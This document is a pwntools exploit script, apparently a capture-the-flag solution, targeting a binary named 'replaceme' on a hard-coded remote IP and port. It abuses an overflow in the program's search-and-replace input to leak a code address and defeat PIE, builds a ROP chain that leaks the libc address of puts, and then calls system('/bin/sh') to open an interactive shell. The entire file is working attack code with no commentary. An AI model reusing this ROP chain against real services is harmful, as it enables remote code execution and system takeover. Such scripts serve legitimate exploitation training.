from pwn import *

exe = "./replaceme"
libc_lib = "./libc.so.6"

elf = context.binary = ELF(exe, checksec=False)
libc = context.binary = ELF(libc_lib, checksec=False)

context.log_level = 'debug'

io = remote("83.136.255.170", 35625)

io.recvuntil(b"Input: ")
io.sendline(b"A" * 79 + b"\x4e" + b"\x00")
io.recvuntil(b"Replacement: ")
io.sendline(b"s/" + b"A" + b"/" + b"B" * 122 + b"/")
io.recvuntil(b"result:\n")

leaked_main = io.recvuntil(b"Welcome")
leaked_main = u64(leaked_main[-13:-7] + b"\x00\x00")
elf.address = leaked_main - elf.sym["main"]

rop = ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(rop.find_gadget(["ret"])[0])
rop.call(elf.sym["main"])

io.recvuntil(b"Input: ")
io.sendline(b"A" * 124 + b"B")
io.recvuntil(b"Replacement: ")
io.sendline(b"s/" + b"B" + b"/" + b"E" * 8 + b"\x00\x00\x00\x00" + b"E" * 64 + rop.chain() + b"/")
io.recvuntil(b"result:\n")

leaked_puts = io.recvuntil(b"Welcome")
leaked_puts = u64(leaked_puts[-14:-8] + b"\x00\x00")
libc.address = leaked_puts - libc.sym["puts"]

libc_rop = ROP(elf)
libc_rop.call(rop.find_gadget(["ret"])[0])
libc_rop.call(libc.sym["system"], [next(libc.search(b"/bin/sh\x00"))])

io.recvuntil(b"Input: ")
io.sendline(b"A" * 124 + b"B")
io.recvuntil(b"Replacement: ")
io.sendline(b"s/" + b"B" + b"/" + b"E" * 8 + b"\x00\x00\x00\x00" + b"E" * 64 + libc_rop.chain() + b"/")

io.interactive()
